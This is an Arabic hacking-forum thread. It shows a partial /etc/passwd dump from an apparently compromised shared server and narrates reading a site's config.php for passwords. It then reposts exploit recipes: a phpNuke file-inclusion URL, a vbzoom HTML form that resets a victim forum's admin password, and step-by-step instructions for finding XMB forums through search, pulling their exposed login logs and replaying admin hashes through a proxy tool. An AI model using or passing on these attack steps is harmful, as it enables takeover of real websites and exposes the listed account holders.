statecapitols:x:677:640::/home/statecapitols:/bin/bash kanjiweb:x:678:641::/home/kanjiweb:/bin/bash freevg:x:681:644::/home/freevg:/bin/bash writersresource:x:682:645::/home/writersresource:/bin/bash evilgraphics:x:684:647::/home/evilgraphics:/bin/bash magdalenhsuli:x:690:650::/home/magdalenhsuli:/bin/bash antioch:x:704:659::/home/antioch:/bin/bash lifelinks:x:705:660::/home/lifelinks:/bin/bash sinecos:x:707:662::/home/sinecos:/bin/bash dosdonas:x:711:666::/home/dosdonas:/bin/bash accuratelegalprocessingse:x:713:668::/home/accuratelegalprocessingse:/bin/bash jc:x:716:581::/home/jc:/bin/emailonly jo:x:717:581::/home/jo:/bin/emailonly infoaai:x:719:581::/home/infoaai:/bin/emailonly gypsytejas:x:721:671::/home/gypsytejas:/bin/bash j-j-c:x:724:674::/home/j-j-c:/bin/bash camp:x:726:660::/home/camp:/bin/emailonly marinabaypark:x:740:677::/home/marinabaypark:/bin/bash gypsy:x:741:671::/home/gypsy:/bin/emailonly meg:x:749:593::/home/meg:/bin/emailonly huwe:x:751:679::/home/huwe:/bin/bash ultimateautomotive50:x:753:681::/home/ultimateautomotive50:/bin/bash socceracademypa:x:755:683::/home/socceracademypa:/bin/bash phoenixfamilymuseum:x:761:689::/home/phoenixfamilymuseum:/bin/bash videoteacher:x:762:690::/home/videoteacher:/bin/bash spiffydesign:x:765:693::/home/spiffydesign:/bin/bash nawaf:x:766:694::/home/nawaf:/bin/bash ccdump:x:768:696::/home/ccdump:/bin/bash drwizard-atlanta:x:772:700::/home/drwizard-atlanta:/bin/bash showme-powerchutes:x:777:705::/home/showme-powerchutes:/bin/bash ************lmandanceacademy:x:778:706::/home/************lmandanceacademy:/bin/bash samelec:x:779:707::/home/samelec:/bin/bash pet-odor:x:780:708::/home/pet-odor:/bin/bash michael1:x:781:593::/home/michael1:/bin/emailonly mmnursereview:x:785:710::/home/mmnursereview:/bin/bash franksland:x:787:712::/home/franksland:/bin/bash gr8gifts4u:x:801:717::/home/gr8gifts4u:/bin/bash globalintercultural:x:806:718::/home/globalintercultural:/bin/bash gotcher-belote:x:807:719::/home/gotcher-belote:/bin/bash francisengineering:x:808:720::/home/francisengineering:/bin/bash befree2:x:814:726::/home/befree2:/bin/bash barclay:x:821:689::/home/barclay:/bin/emailonly airupdate:x:823:732::/home/airupdate:/bin/bash stream:x:825:734::/home/stream:/bin/bash strantech:x:826:735::/home/strantech:/bin/bash newcityftp:x:832:740::/home/newcityftp:/bin/bash nagomifan:x:833:741::/home/nagomifan:/bin/bash gecko:x:834:671::/home/gecko:/bin/emailonly chooseyourlife:x:838:745::/home/chooseyourlife:/bin/bash binarytech:x:839:746::/home/binarytech:/bin/bash <<<طبعا ملف الباس كله طويل لكن حطيته جزء منه مشان تشوفوه>>>> ممم سيرفر جيد و حطيت نسخة عنه في مكتبة ملفات الباسوورد عندي للذكرى المهم نشوف الموقع اشو حكايته romulus2:x:997:837::/home/romulus2:/bin/bash اووووه حركات يوصل ل /bin/bash االمهم فكرت كيف حناخد الباسوورد حق هدا الموقع صاحبي قلي شوف الشادو قلتلو لا تتعب نفسك الشادو هذي الايام مخفي ايام زماااااااااااااااان فقلت خلص نشوف الكونفيق و ان شاء الله يكون صاحب الموقع غبي و حط نفس الباس من ملف الباسوود لاحظت انه الملف هو /home/romulus2 و في طريقة تانية انك تكتب pwd كتبت و طلع /home2/www/romulus2/forum اذا هذا هو مكان ملفات الموقع الصحيحة و اضفت لها /admin/config.php فصار الامر cat /home2/www/romulus2/forum/admin/config.php _________________ __________________________________________________ __ ----------------------------------------------------------------------------------- ثغرة مجلة phpnuke ثغرة مجلة phpnuke http://www.example.com/modules.php?...iewf...path]/vf.txt'/* تضع بدلا منwww.example.com أسم الموقع الذي تريده منقووول ____________________________________ اختراق منتديات vbzoom ------------------------------------------------ السلام عليكم شباب انا اقدم لكم اهم ثغره معى الشرح المفصل <form name="f1" action="http://www.victim.com/vbzoom/register.php" method="POST"> <input type="hidden" name="ChangeProfile" value="1"> User Name: <input type="text" name="UserName"><br> Password: <input type="text" name="Password"><br> Email: <input type="text" name="Email"> <input type="hidden" name="HomePage" value="lamerZ"> <input type="hidden" name="VBZooMForum******************sUserName" value="false"> <input type="hidden" name="VBZooMForum******************sUserName" value="false"> <input type="submit" value="reset password"> </form <form name="f1" action="هنا تضع وصله الموقع " method="POST"> <input type="hidden" name="ChangeProfile" value="1"> User Name: <input type="text" name="UserName"><br> Password: <input type="text" name="Password"><br> Email: <input type="text" name="Email"> <input type="hidden" name="HomePage" value="lamerZ"> <input type="hidden" name="VBZooMForum******************sUserName" value="false"> <input type="hidden" name="VBZooMForum******************sUserName" value="false"> <input type="submit" value="reset password"> </form وبعد ان تحط وصل الموقع تسويه في صفحه html وتكتب اسم الادمين والباسورد الجديده وايميل جديد تحياتي _________________ ثغرة في منتديات من نوع XMB -------------------------------------------------------- بسم الله الرحمن الرحيم طريقة الاختراق : ثغرة جديدة في منتديات من نوع XMB الشرح والتطبيق 1- عليك بالذهاب الى موقع جوجل http://www.google.com 2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final 3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده. 4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى index_log.log يعني راح يكون زي كده http://www.******.com/massegboard/index_log.log 5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء المستخدمين والباسورد وأشياء ثانيه ماتهمنا. 6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه. 7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك هيك مثلا: xmbuser=admin والباسورد راح تلقاه قدامه زي كذه xmbpw=1faeb6747a31c854800ddf3c62b1717a 8- طبعا الباسورد في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج ftp://www.cafecounterintelligence.com/cci/chigger.exe افتح البرنامج وفي : رقم (1) قم بوضع علامة صح. رقم (2) قم بوضع اسم العضو سواء مدير او غيره رقم (3) قم بوضع الباسورد المشفر حق العضو او المدير او غيره رقم (4) قم بوضع علامة صح. رقم (5) قم بوضع البروكسي الي تريده اوالبروكسي حق مزوده الخدمه حقك رقم (6) قم بوضع المنفذ حق البروكسي 10- بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقي ان تذهب الى المتصفح انترنت اكسبلورر > اضغط بالزر اليمين> الأتصالاات> اعدادات> قم بوضع البروكسي هذا 127.0.0.1> والمنفذ 8080 11- بعد ذلك اذهب للمنتدى المستهدف وتجول فيه وكأنك المدير صاحب المنتدى :rolleyes: تحياتي للجميع xvx
مشكور والله يعطيك العافية
قوانين المنتدى